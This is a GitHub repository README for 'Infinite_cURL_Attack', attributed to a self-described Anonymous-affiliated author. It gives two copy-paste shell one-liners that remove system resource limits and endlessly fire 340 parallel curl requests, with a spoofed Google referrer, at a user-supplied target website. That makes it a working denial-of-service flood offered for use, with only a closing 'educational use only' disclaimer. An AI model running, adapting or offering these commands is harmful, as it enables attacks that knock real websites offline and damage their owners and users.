Skip to content

g-h-0-S-t/Infinite_cURL_Attack

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

30 Commits
 
 
 
 

Repository files navigation

Security Tools by gh0$t. Affiliation : Anonymous (hacker group, global).

Infinite_cURL_Attack

Infinite cURL Attack

USAGE : Copy-Paste-Edit the following code (replace https://Your.Target.Website.com with your target website) in the Terminal/CMD & press Enter.

ulimit -t unlimited; ulimit -f unlimited; ulimit -m unlimited; ulimit -u unlimited; ulimit -n 10000000000; ulimit -s unlimited; ulimit -v unlimited; while (true); do seq 1 340 | xargs -n1 -P 340 curl -I -i -v -H "Connection: keep-alive" -H "Referer: https://google.com" "https://Your.Target.Website.com"; done;

If you don't want logs in your terminal and make the attacks faster, do this (the following is my preference):

ulimit -t unlimited; ulimit -f unlimited; ulimit -m unlimited; ulimit -u unlimited; ulimit -n 10000000000; ulimit -s unlimited; ulimit -v unlimited; while (true); do seq 1 340 | xargs -n1 -P 340 curl -s -H "Connection: keep-alive" -H "Referer: https://google.com" "https://Your.Target.Website.com" > /dev/null; done;

IMPORTANT:
THIS SOFTWARE IS PROVIDED FOR EDUCATIONAL USE ONLY!
IF YOU ENGAGE IN ANY ILLEGAL ACTIVITY THE AUTHOR DOES NOT TAKE ANY RESPONSIBILITY FOR IT.
BY USING THIS SOFTWARE YOU AGREE WITH THESE TERMS.